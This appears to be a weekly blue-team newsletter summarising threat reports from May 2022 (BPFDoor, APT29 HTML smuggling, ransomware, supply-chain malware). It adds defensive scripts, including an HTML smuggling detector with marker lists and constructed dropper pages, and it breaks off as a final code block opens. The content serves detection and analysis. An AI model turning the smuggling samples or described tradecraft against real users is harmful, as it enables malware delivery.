Cyber Defence Analysis for Blue & Purple Teams

Bluepurple Pulse: week ending May 22nd

bluepurple.binaryfirefly.com

Cyber is busy...

Ollie
May 20, 2022

Welcome to the weekly highlights and analysis of the blueteamsec subreddit (and my wider reading).

Operationally this week we have seen an uptick in cases involving Black Basta and Bozon3 in clients, and CISA issued an emergency directive related to VMware vulnerabilities (technical details covered later).

In the high-level this week:

  • Pushing back on Beijing in the EU-U.S. Trade and Technology Council - a hypothesis that the EU-U.S. Trade and Technology Council is being used to address risks emanating from China.

  • Strengthening EU-wide cybersecurity and resilience – provisional agreement by the Council and the European Parliament - NIS2 reaches provisional agreement and the 21 month transposition clock starts ticking - we should see some sector improvements and more war gaming around large scale (continent scale) incidents as a result.

  • UK Civil nuclear cyber security strategy 2022 - After the UK’s National Strategy (2021) and then the Government Strategy (2022) the UK has released its Civil Nuclear strategy - it is interesting to see the evolution of, and the interlinks between, them all.

  • Chinese Concepts and Opportunities in Information Warfare: China-US Rivalry in Cyberspace - Russian academic paper looking at US-Sino cyber rivalry - the data point here is that Russian academics are studying what is going on; the conclusions are also stark - “China continues to develop the strategic course aimed at using information warfare to achieve its national political and economic goals. Beijing is progressively developing the concept of introducing the information warfare in order to attract excessive attention from the world community, which has already named it the “Cyber Dragon””

  • First meeting of NATO national cyber coordinators - press release about a meeting sans any content of said meeting.

  • The U.S. Department of State, the U.S. Department of the Treasury, and the FBI issue an advisory for the international community, the private sector, and the public warning of attempts by Democratic People’s Republic of Korea (DPRK, a.k.a. North Korea) information technology (IT) workers to obtain employment while posing as non-North Korean nationals - when remote working goes wrong, or level 11 sanction busting red teaming..

  • Department of Justice Announces New Policy for Charging Cases under the Computer Fraud and Abuse Act - New guidance from the DoJ - the policy for the first time directs that good-faith security research should not be charged - but again it is only guidance - a researcher can still be arrested and investigated and then hope they follow the guidance. Still needs primary legislation reform for the CFAA and also the UK’s Computer Misuse Act - as employers we need certainty.

  • Weak Security Controls and Practices Routinely Exploited for Initial Access - FIVE EYES basically say get better at the basic hygiene factors because bad actors are leveraging the gaps.

  • Hacker and Ransomware Designer Charged for Use and Sale of Ransomware, and Profit Sharing Arrangements with Cybercriminals in the US - the ransomware tool author was a medical doctor.

  • Nuclear-Crisis Management and Cyber War—A Dangerous Crossroads - The rule book for nuclear-crisis management in this era of cyber deterrence and cyber war remains to be written apparently - a thought piece on the topic.

  • US Congress has been busy on the cyber front this week with two bills passing:

    • President’s Cup Cybersecurity Competition Act - apparently you need Congress to authorize CISA/DHS to hold an annual competition.

    • DHS Roles and Responsibilities in Cyber Space Act - providing organisational clarity for cyber in US Government for DHS.

  • Bada Bing, Bada Boom: Microsoft Bing’s Chinese Political Censorship of Autosuggestions in North America - “We consistently found that Bing censors politically sensitive Chinese names over time, that their censorship spans multiple Chinese political topics, consists of at least two languages, English and Chinese, and applies to different world regions, including China, the United States, and Canada”

  • Invoice Fraud Using Executive and Vendor Impersonation - Whaling and similar are common - but a good reminder of the threat

In terms of reflections this week, nothing material other than cyber is busy on almost every level, as evidenced by the content below. It does concern me that as an industry we still don’t really have strong evidence bases for what works in practice in a lot of cases. What evidence we do have is also hard to find at times.

On the offensive side our evidence base says a team of 5 and a budget of £/$5-10 million can really get into most organisations in 2022.


Have a lovely Friday

Ollie

Cyber threat intelligence

Who is doing what to whom and how.

Ukraine

Aggregate reporting on the in region activity.

Custom PowerShell RAT targets Germans seeking information about the Ukraine crisis

Hossein Jazi and Jérôme Segura detail a speculative campaign against Germany which is basic and broad.

a new campaign that plays on these concerns by trying to lure Germans with a promise of updates on the current threat situation in Ukraine. The downloaded document is in fact decoy for a Remote Access Trojan (RAT) capable of stealing data and executing other malicious commands on a victim’s computer.

https://blog.malwarebytes.com/threat-intelligence/2022/05/custom-powershell-rat-targets-germans-seeking-information-about-the-ukraine-crisis/

Network Footprints of Gamaredon Group

Onur Mustafa Erdogan details what they saw in March around this Russian threat actor and provides some concrete indicators of compromise for defenders to search back on.

https://blogs.cisco.com/security/network-footprints-of-gamaredon-group

The IO Offensive: Information Operations Surrounding the Russian Invasion of Ukraine

Alden Wahlstrom, Alice Revelli, Sam Riddell, David Mainor and Ryan Serabian detail information operations from anti-western forces.

[We have] identified activity that we attributed to information operations campaigns conducted by actors we judge to be operating in support of the political interests of nation-states such as Russia, Belarus, China, and Iran, including ongoing campaigns that we have tracked for years. This report examines a slice of this activity, highlighting significant information operations Mandiant has observed in our work responding to the invasion and presenting our early analysis of those events.

https://www.mandiant.com/resources/information-operations-surrounding-ukraine

Killnet Cyber Attacks Against Italy and NATO Countries

Alessandro Brucato details a possible pro-Russian campaign against Italy to cause disruption.

On May 11, several Italian institutional websites, including the Italian Senate, the Ministry of Defense, and the National Institute of Health, were taken offline and unreachable for a few hours. This was day one of a multiday cyber attack, which targeted other Italian websites as well as other countries. The pro-Russian hacker groups Killnet and Legion claimed the attacks through their Telegram channels, killnet_channel and legion_russia using the Mirai malware to perform their DDoS (distributed denial-of-service) attacks to Italian websites.

https://sysdig.com/blog/killnet-italy-and-nato/

Fronton: A Botnet for Creation, Command, and Control of Coordinated Inauthentic Behavior

A Russian botnet, Fronton, built to create and run coordinated inauthentic behaviour rather than plain DDoS, plus some good open source sleuthing.

One, involving comments around a squirrel statue in Almaty, Kazakhstan may have affected the reporting on a BBC story. As of April 2022, 0day technologies has changed its domain from 0day[.]ru to 0day[.]llc. An instance of the SANA system appears to be up at https://sana.0day[.]llc . Nisos assesses that this is possibly a testing or demo instance, and is not currently used by the FSB. Nisos researchers conducted open source research to discover 0day is known as 0Dt, full name Zeroday Technologies LLC (0Дт, OOO ЗИРОУДЭЙ ТЕХНОЛОДЖИС) based at Ulitsa Profsoyuznaya, D. 125, Etazh Tsokolnyi Pomesht. I, Kom. 14 Moscow; Moscow; Postal Code: 117647

https://6068438.fs1.hubspotusercontent-na1.net/hubfs/6068438/fronton-report.pdf

Twisted Panda: Chinese APT espionage operation against Russian’s state-owned defense institutes

What happens when your best friend starts a fight when you are busy waging a war? This!

  • a targeted campaign against at least two research institutes in Russia, whose primary expertise is the research and development of highly technological defense solutions. Research suggests that another target in Belarus, likely also related to the research field, received a similar spear-phishing email claiming that the US is allegedly spreading a biological weapon.

  • The defense research institutes that we identified as targets of this attack belong to a holding company within the Russian state-owned defense conglomerate Rostec Corporation. It is Russia’s largest holding company in the radio-electronics industry and the specific targeted research institutes’ primary focus is the development and manufacturing of electronic warfare systems, military-specialized onboard radio-electronic equipment, air-based radar stations and means of state identification.

  • This campaign is a continuation of what [we] believe to be a long-running espionage operation against Russian-related entities that has been in operation since at least June 2021. The operation may still be ongoing, as the most recent activity was observed in April 2022.

  • This activity was attributed with high confidence to a Chinese threat actor, with possible connections to Stone Panda (aka APT10), a sophisticated and experienced nation-state-backed actor, and Mustang Panda, another proficient China-based cyber espionage threat actor. CPR named this campaign Twisted Panda to reflect the sophistication of the tools observed and the attribution to China.

  • The hackers use new tools, which have not previously been described: a sophisticated multi-layered loader and a backdoor dubbed SPINNER. These tools are in development since at least March 2021 and use advanced evasion and anti-analysis techniques such as multi-layer in-memory loaders and compiler-level obfuscations.

https://research.checkpoint.com/2022/twisted-panda-chinese-apt-espionage-operation-against-russians-state-owned-defense-institutes/

New Trend of Modular Backdoor and APT Attacks

Sophisticated threat actors clearly want better return on investment from their development. A modular backdoor from China used by a number of threat actors, takeaways include:

Pangolin8RAT could be the next gen PlugX/ShadowPad

Tianwu might operate as: a collaborator of APT41, a subgroup of APT41, or a digital quartermaster of Chinese APTs

https://teamt5.org/en/posts/black-hat-asia-2022-new-trend-of-modular-backdoor-and-apt-attacks/

https://i.blackhat.com/Asia-22/Thursday-Materials/AS-22-LeonSilvia-NextGenPlugXShadowPad.pdf

BPF Back Doors

After last week's starting gun from Kevin, numerous parties dumped their reporting on it this week.

Tricephalic Hellkeeper: a tale of a passive backdoor

Tristan Pourcelot provides an excellent analysis of a BPF back door.

https://exatrack.com/public/Tricephalic_Hellkeeper.pdf

A peek behind the BPFDoor

Colson Wilhoit, Alex Bell, Rhys Rustad-Elliott and Jake King drop their analysis along with some solid detection trade-craft.

The first area of opportunity we witnessed while testing was the behavior we observed during the initial execution of the malware, specifically its working directory, in a shared memory location /dev/shm. This is a native temporary filesystem location in Linux that uses RAM for storage, and a binary executing from it let alone generating network connections is fairly uncommon in practice.

During execution, BPFDoor removes existing files from /dev/shm and copies itself there prior to initialization. A detection for this would be any execution of a binary from this directory as root (you have to be root to write to and read from this directory).

https://elastic.github.io/security-research/intelligence/2022/05/04.bpfdoor/article/
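The /dev/shm check above is cheap to script, so here is an added example of my own (not Elastic's code and not their detection rule): a triage script that walks /proc for live processes whose executable or working directory sits under /dev/shm or /run/shm, and that also flags an executable unlinked after exec, which the kernel reports with a "(deleted)" suffix on /proc/<pid>/exe. One caveat worth carrying alongside the quote: /dev/shm is normally mode 1777, so any local user can write to it, not only root; the script therefore flags every uid and just scores root higher. The sample records are constructed, not real telemetry.

```python
import os
from dataclasses import dataclass
from typing import Iterable, List

SUSPECT_DIRS = ("/dev/shm", "/run/shm")   # RAM-backed tmpfs mounts, world-writable (mode 1777) by default
DELETED = " (deleted)"                      # suffix the kernel appends to /proc/<pid>/exe after unlink


@dataclass
class Proc:
    pid: int
    uid: int
    exe: str       # target of the /proc/<pid>/exe symlink
    cwd: str       # target of the /proc/<pid>/cwd symlink
    cmdline: str


def under_tmpfs(path: str) -> bool:
    # Exact directory or a child of it; a bare prefix test would also match e.g. /dev/shmfoo
    return any(path == d or path.startswith(d + "/") for d in SUSPECT_DIRS)


def flag_shm_processes(procs: Iterable[Proc]) -> List[dict]:
    """Return one finding per process that executes from, or works inside, a tmpfs location."""
    findings = []
    for p in procs:
        exe = p.exe[:-len(DELETED)] if p.exe.endswith(DELETED) else p.exe
        reasons = []
        if under_tmpfs(exe):
            reasons.append("executable under tmpfs")
        if p.exe.endswith(DELETED):
            reasons.append("executable unlinked after exec")
        if under_tmpfs(p.cwd):
            reasons.append("working directory under tmpfs")
        if reasons:
            findings.append({
                "pid": p.pid, "uid": p.uid, "exe": p.exe, "cmdline": p.cmdline,
                "reasons": reasons,
                "severity": "high" if p.uid == 0 else "medium",   # non-root can write here too
            })
    return findings


def scan_proc(proc_root: str = "/proc") -> List[Proc]:
    """Collect live processes from procfs (reading other users' exe/cwd links needs root)."""
    procs = []
    for entry in os.listdir(proc_root):
        if not entry.isdigit():
            continue
        base = os.path.join(proc_root, entry)
        try:
            exe = os.readlink(os.path.join(base, "exe"))
            cwd = os.readlink(os.path.join(base, "cwd"))
            with open(os.path.join(base, "status")) as fh:
                uid = next(int(line.split()[1]) for line in fh if line.startswith("Uid:"))
            with open(os.path.join(base, "cmdline"), "rb") as fh:
                cmdline = fh.read().replace(b"\0", b" ").decode(errors="replace").strip()
        except (OSError, StopIteration):
            continue   # process exited mid-scan, kernel thread without exe, or no permission
        procs.append(Proc(int(entry), uid, exe, cwd, cmdline))
    return procs


# Constructed sample records standing in for a /proc walk (not real telemetry)
SAMPLE_PROCS = [
    Proc(1, 0, "/usr/lib/systemd/systemd", "/", "/sbin/init"),
    Proc(4242, 0, "/dev/shm/.x (deleted)", "/dev/shm", "/sbin/udevd"),
    Proc(5001, 1000, "/usr/bin/python3", "/dev/shm", "python3 build.py"),
    Proc(777, 0, "/dev/shmfoo/bin/app", "/", "app"),   # prefix trap: must not match
]

if __name__ == "__main__":
    for finding in flag_shm_processes(SAMPLE_PROCS):
        print("sample:", finding)
    if os.path.isdir("/proc"):
        for finding in flag_shm_processes(scan_proc()):
            print("live:", finding)
```

Run it as root on a suspect box to get the live findings; the cmdline is included because a process name that does not match its on-disk executable is worth a second look on its own.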

Cozy Smuggled Into the Box: APT29 Abusing Legitimate Software for Targeted Operations in Europe

Russia going after European targets with an implant a number of us have seen over the last while.

The misuse of legitimate webservices is in attempt to evade the detection from automatic analysis software. Recently, third-party researchers have also reported it used Trello and its REST API to simulate a first-level Command & Control server. In addition to this evasion attempt, as we are going to discuss later, the side-loaded DLL tries to unhook the windows libraries loaded in the process memory to evade possible EDRs.

To maximize the chances of success, Nobelium, in at least two cases, sent spear-phishing emails from spoofed or compromised government addresses. As initial access we identified the following attack vectors:

  1. The first approach involves the distribution of an IMG file which, when mounted, contains an LNK shortcut and the signed software with the other DLLs and a decoy PDF as hidden files. This attack vector lures the user through a masquerading technique by changing the LNK file icon to a folder icon in order to convince the user to click on it. In fact, once triggered, the cmd.exe utility is invoked to run the signed executable and to start the side-loading of the malicious DLL (i.e. AcroSup.dll).

  2. The second approach involves the usage of the EnvyScout dropper that is basically an HTML file with an embedded JavaScript designed to decode and drop the next-stage payload (HTML Smuggling). In fact, once the HTML file is executed, the JavaScript code decodes a bytes array and saves the result under an archive in the Download directory. In this case, the user is responsible to unzip the archive (that contains the signed software, the relative DLL’s and the lure PDF) and to run manually the executable to start the chain (even if the JavaScript code contains unused snippet for automating the process).

The EnvyScout dropper was used by this threat actor in different campaigns. From mid-January 2022 we internally reported different Nobelium-linked campaigns against European entities that leveraged fairly complex kill-chain started with EnvyScout as well.

https://cluster25.io/2022/05/13/cozy-smuggled-into-the-box/
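The EnvyScout pattern in point 2 (a byte array inside the page's JavaScript, decoded and dropped through a Blob) is easy to pull apart offline. What follows is an added example of mine, not Cluster25's tooling: it scans an HTML file for the usual HTML smuggling markers, decodes any large JavaScript byte array or base64 string it finds, and identifies the dropped file by magic bytes. The two sample pages and the zip they carry are constructed inline; the member names inside the zip (AcroSup.dll and a decoy PDF) are taken from the report's description purely as labels.

```python
import base64
import io
import re
import zipfile
from dataclasses import dataclass
from typing import List, Set

SMUGGLING_MARKERS = ("new Blob(", "URL.createObjectURL", "msSaveOrOpenBlob",
                     "Uint8Array", "atob(", ".download")
_ARRAY_RE = re.compile(r"\[\s*((?:\d{1,3}\s*,\s*){63,}\d{1,3})\s*\]")   # 64+ numeric elements
_B64_RE = re.compile(r"""["']([A-Za-z0-9+/]{64,}={0,2})["']""")          # long base64 literal


@dataclass
class Payload:
    encoding: str   # "byte-array" or "base64"
    kind: str       # "zip", "iso", "pe" or "unknown"
    data: bytes


def smuggling_indicators(html: str) -> Set[str]:
    """Which of the usual HTML-smuggling JavaScript markers appear in the page."""
    return {m for m in SMUGGLING_MARKERS if m in html}


def identify(data: bytes) -> str:
    if data.startswith(b"PK\x03\x04"):
        return "zip"
    if data.startswith(b"MZ"):
        return "pe"
    if len(data) > 0x8006 and data[0x8001:0x8006] == b"CD001":   # ISO 9660 primary volume descriptor
        return "iso"
    return "unknown"


def extract_smuggled_payloads(html: str) -> List[Payload]:
    """Decode every embedded byte array / base64 blob large enough to be a dropped file."""
    found = []
    for m in _ARRAY_RE.finditer(html):
        values = [int(v) for v in m.group(1).split(",")]
        if all(0 <= v <= 255 for v in values):
            data = bytes(values)
            found.append(Payload("byte-array", identify(data), data))
    for m in _B64_RE.finditer(html):
        try:
            data = base64.b64decode(m.group(1), validate=True)
        except ValueError:          # binascii.Error: looked like base64 but was not
            continue
        found.append(Payload("base64", identify(data), data))
    return found


def archive_members(data: bytes) -> List[str]:
    return zipfile.ZipFile(io.BytesIO(data)).namelist()


# --- constructed samples (not real EnvyScout pages) ---
def _sample_zip() -> bytes:
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_STORED) as zf:
        zf.writestr("lure.pdf", b"%PDF-1.4 constructed decoy")
        zf.writestr("AcroSup.dll", b"MZ" + b"\0" * 62)
    return buf.getvalue()

SAMPLE_ZIP = _sample_zip()

SAMPLE_HTML_ARRAY = f"""<html><body><script>
var data = [{", ".join(str(b) for b in SAMPLE_ZIP)}];
var blob = new Blob([new Uint8Array(data)], {{type: "application/octet-stream"}});
var a = document.createElement("a"); a.href = URL.createObjectURL(blob);
a.download = "update.zip"; a.click();
</script></body></html>"""

SAMPLE_HTML_B64 = f"""<html><body><script>
var raw = atob("{base64.b64encode(SAMPLE_ZIP).decode()}");
var bytes = new Uint8Array(raw.length);
for (var i = 0; i < raw.length; i++) bytes[i] = raw.charCodeAt(i);
navigator.msSaveOrOpenBlob(new Blob([bytes]), "update.zip");
</script></body></html>"""

if __name__ == "__main__":
    for page in (SAMPLE_HTML_ARRAY, SAMPLE_HTML_B64):
        print(sorted(smuggling_indicators(page)))
        for p in extract_smuggled_payloads(page):
            print(p.encoding, p.kind, len(p.data), archive_members(p.data) if p.kind == "zip" else "")
```

Real droppers often XOR or otherwise transform the array before building the Blob, so treat an "unknown" result as a prompt to read the decoding loop in the script rather than as a clean bill of health.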

HUI Loaderの分析 - Analysis of HUI Loader as used by APT10

Japanese reporting on a Chinese threat actor and their malicious code loader which has been in use since 2015 and still in use today! APT sweating the asset.

Transition of HUI Loader

HUI Loader is a loader that has been used for a long time while being updated little by little from around 2015. It is expected that it will continue to be used in the future.

https://blogs.jpcert.or.jp/ja/2022/05/HUILoader.html

Wizard Spider Group In-Depth Analysis

What happens if you are a Cyber Threat Intelligence company in Switzerland and Turkey? Well you get to produce this report apparently by gaining ‘visibility’ into adversary infrastructure.

We obtained visibility into critical elements of the group’s infrastructure and collected vital data on its kill chain, as shown below

Our infrastructure analysis revealed a great deal of exclusive, never-before-seen information regarding the group and its technical infrastructure, in addition to the following information :

  • Highly-secret credentials/documents for at least 30+ victims.

  • 400+ different binaries including BazarLoader, Qbot, PowerShell scripts, Cobalt Strike beacons, executable files, exploits, and custom toolkits.

  • VPN and file transfer tool’s configurations files.

  • 750+ victim’s kerberos tickets, domain admin passwords, hashes, etc.

  • Anonymous credentials used for operational needs.

  • 5 bitcoin addresses likely owned by a threat actor who plays a role processing victim payments.

https://www.prodaft.com/m/reports/WizardSpider_TLPWHITE_v.1.4.pdf

Phishing Campaign Delivering Three Fileless Malware: AveMariaRAT / BitRAT / PandoraHVNC – Part I

Xiaopeng Zhang documents “fileless” malware delivered by an Excel file whose VBA uses mshta to fetch a remote .htm file with JavaScript inside it. So not entirely fileless in reality.

We captured a phishing campaign that was delivering three fileless malware onto a victim’s device. Once executed, they are able to steal sensitive information from that device.

..

[which] obtains three fileless malware in a huge downloaded PowerShell file to bypass detection, and how these are later deployed and executed inside the target processes through Process Hollowing. These three fileless malware are AveMariaRAT / BitRAT / PandoraHVNC.

https://www.fortinet.com/blog/threat-research/phishing-campaign-delivering-fileless-malware

filesyncshell.dll hijacking? Briefing on the latest APT-C-24 Rattlesnake attack activity

Chinese reporting on an Indian threat actor targeting China itself. Weak quality assurance meant it didn’t detonate successfully in the target environment.

We recently captured a slightly unusual incident of attack activity. The attack was launched by the APT-C-24 (Sidewinder) organization, which changed the previous attack framework and used a new attack method and process. Interestingly, in this attack activity, due to the software version, the attack activity could not be completed normally according to the normal code execution logic. It seems that our old friend Sidewinder APT organization is not completely synchronized with the Chinese environment in the code testing environment.

https://mp-weixin-qq-com.translate.goog/s/qsGxZIiTsuI7o-_XmiHLHg?_x_tr_sl=zh-CN&_x_tr_tl=en&_x_tr_hl=en

The BlackByte ransomware group is striking users all over the globe

Useful trade craft insight and clear usage of living off the land binaries.

  • [We have] been monitoring the BlackByte Ransomware Group for several months, infecting victims all over the world, from North America to Colombia, Netherlands, China, Mexico and Vietnam.

  • BlackByte updated its leak site with a new design and new victims and is still actively exploiting victims worldwide. 

The attack usually starts with a network entry point, either a previously compromised host or a software vulnerability which is exploitable from the network. The former compromised host elevates local and domain account privileges and moves laterally by using standard penetration testing and legit administrator tools (LoLBins). In most incidents, they like to use the AnyDesk remote management software to control victim machines. 

https://blog.talosintelligence.com/2022/05/the-blackbyte-ransomware-group-is.html

Rust Supply-Chain Attack Infects Cloud CI Pipelines with Go Malware

Juan Andrés Guerrero-Saade provides details on a software library repository supply chain attack. The contagion risk to the upstream of this style of attack is vast and one that I sense we really haven’t got a full handle on today.

  • [We] investigated a supply-chain attack against the Rust development community that we refer to as ‘CrateDepression’.

  • On May 10th, 2022, the Rust Security Response Working Group released an advisory announcing the discovery of a malicious crate hosted on the Rust dependency community repository.

  • The malicious dependency checks for environment variables that suggest a singular interest in GitLab Continuous Integration (CI) pipelines.

  • Infected CI pipelines are served a second-stage payload. We have identified these payloads as Go binaries built on the red-teaming framework, Mythic.

  • Given the nature of the victims targeted, this attack would serve as an enabler for subsequent supply-chain attacks at a larger-scale relative to the development pipelines infected.

  • We suspect that the campaign includes the impersonation of a known Rust developer to poison the well with source code that relies on the typosquatted malicious dependency and sets off the infection chain.

https://www.sentinelone.com/labs/cratedepression-rust-supply-chain-attack-infects-cloud-ci-pipelines-with-go-malware/

Mars Stealer - the latest version of Oski Stealer

Commodity malware to steal funds goes brrrrr..

Mars Stealer is an information-stealing malware that first appeared on hacking forums in June 2021, a year after its predecessor Oski Stealer was discontinued in June 2020. Mars Stealer can target or ‘support’ over 50 crypto wallets and extensions, is multi-functional, and avoids detection. In addition, it’s low price on the malware market has generated significant attention from threat actor(s) who are looking to add the effective malware into their arsenal.

  • Mars Stealer is the latest version of Oski Stealer, which was discontinued in June 2020.

  • NetSupport RAT (Remote Access Tool), or client32.exe, was embedded in a ChromeSetup.exe file and used by an attacker to gain access to a victim’s workstation for further deployment of tools needed to plant Mars Stealer.

  • An executable with the original filename 3uAirPlayer was used to deploy obfuscated AutoIt scripts with Mars Stealer embedded inside and a renamed version of AutoIt to evade detections.

  • The persistence mechanism was created to make sure the attacker(s) maintain access to NetSupportManager as a backdoor.

  • Mars Stealer can self-delete itself after successfully exfiltrating the victim’s data, leaving no trace behind.

https://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-mars-stealer

A closer look at Eternity Malware - Threat Actors Leveraging Telegram To Build Malware

Cyber crime adopts chat bots to build malware. How very customer focused!

Interestingly, individuals who purchase the malware can utilize the Telegram Bot to build the binary. The TAs provide an option in the Telegram channel to customize the binary features, which provides an effective way to build binaries without any dependencies.  

https://blog.cyble.com/2022/05/12/a-closer-look-at-eternity-malware/

oRAT Malware

More macOS / Windows malware using some rather clumsy trade-craft.

The oRAT malware is distributed as a Disk Image (.dmg) masquerading as a Bitget application

  • Earth Berberoka (aka GamblingPuppet) is a new APT group reportedly using a cross-platform malware named “oRAT” to target Windows and macOS.

  • Reports indicate that oRAT spreads by disguising itself as a crypto trader application, and is coded in Golang.

https://assets.sentinelone.com/customer-watchtower-white/orat-flash-wt

UpdateAgent malware adapts again

Further malicious activity targeting macOS which looks like it is pay-per-install on behalf of various actors.

The newly discovered Swift-based dropper exhibits many of the characteristics of typical dropper malware, including some minor system fingerprinting, endpoint registration and persistence. The second stage download and execute the functionality of droppers, in general, represent a risky class of malware that support a number of second-stage attacks — from malware to spyware, to adware.

https://www.jamf.com/blog/updateagent-adapts-again/

Chaos Ransomware

Multiple reporting on this threat this week.

Chaos Code Reused - Yashma and ONYX

First bit of reporting from earlier in the month.

[We] identified 2 ransomware payloads, identified as Yashma and ONYX, that contain reused code strains from Chaos ransomware, which was first reported in 2021.

  • Recently, threat actors deploying ONYX posted news on their intrusion into 6 organizations.

  • After further assessment, [we] have moderate confidence that these payloads were coded through builder tools and lack sophistication of other strains. There is a risk of new variants appearing in the coming months.

https://assets.sentinelone.com/customer-watchtower-white/chaos-code-reused-wt

Chaos Ransomware Variant Sides with Russia

Gergely Revay and Shunichi Imano outline that a ransomware group has sided with the Russian state. Turns out it isn’t ransomware - but a wiper dressed up to look like one.

[We] recently came across a variant of the Chaos ransomware that appears to side with Russia. This blog explains the vicious consequences that the Chaos variant delivers to a compromised machine.

The Chaos ransomware variant that this blog covers is unique in the sense that the attacker has no intention of providing a decryption tool or file recovery instructions for its victims to recover their affected files.

https://www.fortinet.com/blog/threat-research/chaos-ransomware-variant-sides-with-russia

The Goot cause: Detecting Gootloader and its follow-on activity

I have been covering these Search Engine Optimization (SEO) attacks to distribute malware for the last few weeks, turns out this week is no exception. This is a great analysis of the end-to-end attack chain by Tony Lambert.

We’ve increasingly observed Gootloader operators using search engine optimization (SEO) poisoning tactics to gain access to victims’ environments and initiate multi-pronged intrusions involving follow-on payloads such as Cobalt Strike and Gootkit.

https://redcanary.com/blog/gootloader/

Rise in XorDdos: A deeper look at the stealthy DDoS malware targeting Linux devices

Linux focused threat using SSH brute forcing as the initial access vector and then deploying a modular implant. Tim will be happy this week! (Hi Tim!).

In the last six months, we observed a 254% increase in activity from a Linux trojan called XorDdos. First discovered in 2014 by the research group MalwareMustDie, XorDdos was named after its denial-of-service-related activities on Linux endpoints and servers as well as its usage of XOR-based encryption for its communications.

XorDdos uses evasion and persistence mechanisms that allow its operations to remain robust and stealthy. Its evasion capabilities include obfuscating the malware’s activities, evading rule-based detection mechanisms and hash-based malicious file lookup, as well as using anti-forensic techniques to break process tree-based analysis.

https://www.microsoft.com/security/blog/2022/05/19/rise-in-xorddos-a-deeper-look-at-the-stealthy-ddos-malware-targeting-linux-devices/

Discovery

How we find and understand the latent compromises within our environments.

IR Last Write Time

أبويعقوب releases a useful script to identify file system activity in a specific date/time window quickly.

Simple PowerShell Script to Help You Find All Files That Have Been Modified In A Time Range.

https://github.com/3gbCyber/IR-Last-Write-Time
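The same idea in Python, as an added example of mine rather than the IR-Last-Write-Time script: it returns every file under a root whose modification time falls inside a UTC window and, by default, also checks ctime (inode change time on Linux and macOS), which a back-dated mtime does not move because utime cannot set it. The demo builds a throwaway directory with constructed files and stomped mtimes to show the difference; the file names and dates are made up.

```python
import os
import shutil
import tempfile
from datetime import datetime, timedelta, timezone
from typing import List, NamedTuple, Tuple


class Hit(NamedTuple):
    path: str
    field: str        # "mtime" (content written) or "ctime" (inode metadata changed)
    when: datetime


def files_changed_between(root: str, start: datetime, end: datetime,
                          include_ctime: bool = True) -> List[Hit]:
    """Every file under root whose mtime (and optionally ctime) lies in [start, end], oldest first."""
    if start.tzinfo is None or end.tzinfo is None:
        raise ValueError("use timezone-aware datetimes (UTC) so the window survives DST and host TZ")
    hits: List[Hit] = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            try:
                st = os.lstat(full)           # lstat: report the link itself, do not follow it
            except OSError:
                continue                      # vanished or unreadable; keep walking
            # On Linux/macOS st_ctime is inode change time; on Windows it is creation time,
            # so the timestomp argument below only holds on POSIX filesystems.
            fields = [("mtime", st.st_mtime)] + ([("ctime", st.st_ctime)] if include_ctime else [])
            for field, ts in fields:
                when = datetime.fromtimestamp(ts, tz=timezone.utc)
                if start <= when <= end:
                    hits.append(Hit(full, field, when))
    hits.sort(key=lambda h: (h.when, h.path))
    return hits


def demo() -> Tuple[List[str], List[str]]:
    """Constructed scenario: three files whose mtimes were back-dated, as a timestomper would leave them."""
    tmp = tempfile.mkdtemp(prefix="irlwt-")
    stamps = {"a.docx": "2022-05-15T12:00:00", "b.exe": "2022-05-10T08:00:00",
              "c.ps1": "2022-05-15T23:59:00"}
    for name, iso in stamps.items():
        path = os.path.join(tmp, name)
        with open(path, "wb") as fh:
            fh.write(b"constructed sample")
        t = datetime.fromisoformat(iso).replace(tzinfo=timezone.utc).timestamp()
        os.utime(path, (t, t))                # sets atime/mtime only; ctime moves to "now"
    window = (datetime(2022, 5, 15, tzinfo=timezone.utc), datetime(2022, 5, 16, tzinfo=timezone.utc))
    by_mtime = [os.path.basename(h.path) for h in files_changed_between(tmp, *window)]
    now = datetime.now(timezone.utc)
    recent = files_changed_between(tmp, now - timedelta(hours=1), now + timedelta(hours=1))
    by_ctime = sorted({os.path.basename(h.path) for h in recent if h.field == "ctime"})
    shutil.rmtree(tmp, ignore_errors=True)
    return by_mtime, by_ctime


if __name__ == "__main__":
    print(demo())
```

The first list is what a pure last-write-time search returns for the incident window; the second is what the ctime check adds, and it is the one that catches the file whose mtime was pushed back to 10 May.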

USB Devices Redux: Windows forensics

H. Carvey revisits USB forensics on Windows 10 and highlights that a configuration change (enabling an event log) may be required to get the most out of it.

Also, in researching information for this topic, I found that the EMDMgmt key in the Software hive, which is associated with ReadyBoost and provided insight into USB-connected devices, is no longer available either.

From a forensic perspective, if you're interested in tracking USB devices connected to systems, I'd recommend enabling the Microsoft-Windows-DriverFrameworks-UserMode/Operational Event Log, forwarding those event records off of the system (for processing via a SIEM).

http://windowsir.blogspot.com/2022/05/usb-devices-redux.html

New processor for BPF bytecode by Heurs for Ghidra

Given all the BPF reporting recently it is pretty epic to see this pull request for Ghidra by Heurs. Note this is classic BPF and NOT eBPF.

https://github.com/NationalSecurityAgency/ghidra/pull/4258

Defence

How we proactively defend our environments.

Tetragon - eBPF-based Security Observability & Runtime Enforcement

A new player has entered the Linux telemetry space (against Microsoft Sysmon for Linux and others..), and one that is also container aware.

Tetragon detects and is able to respond in real time to security-significant events, such as

  • Process execution events

  • Changes to privileges and capabilities

  • I/O activity including network & file access

When used in a Kubernetes environment, Tetragon is Kubernetes-aware - that is, it understands Kubernetes identities such as namespaces, pods and so-on - so that security event detection can be configured in relation to individual workloads.

https://github.com/cilium/tetragon

Cyberchef Recipe for Cobalt Strike

Various CyberChef recipes to help with beacon analysis:

  • Cobalt Strike Reflective Loader(beacon) v4 for x64

  • Cobalt Strike Reflective Loader(beacon) v4 for x32

https://gist.github.com/michaelder

WebApp for converting Sigma detection rules into SIEM queries

Julian Ortel releases this open source project which allows you to convert Sigma rules to Splunk or Rapid7 InsightIDR format.

Inspired by uncoder.io I wrote my own implementation using the new pySigma library

https://github.com/M3NIX/sigmaio
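For anyone wondering what such a conversion has to do under the hood, here is an added example of mine (not sigmaio's or pySigma's code): a Sigma rule, shown as the dict PyYAML would produce, with selection and filter maps, list values, the contains/startswith/endswith modifiers and a boolean condition, rendered to a Splunk search, plus a small evaluator that runs the same rule over process creation events so the conversion can be checked against data. The rule is the Excel-to-mshta chain from the Fortinet phishing write-up earlier in this issue, so this block also serves as the detection for that; the logsource prefix and the "legit-updater" allowlist are assumptions, and the events are constructed.

```python
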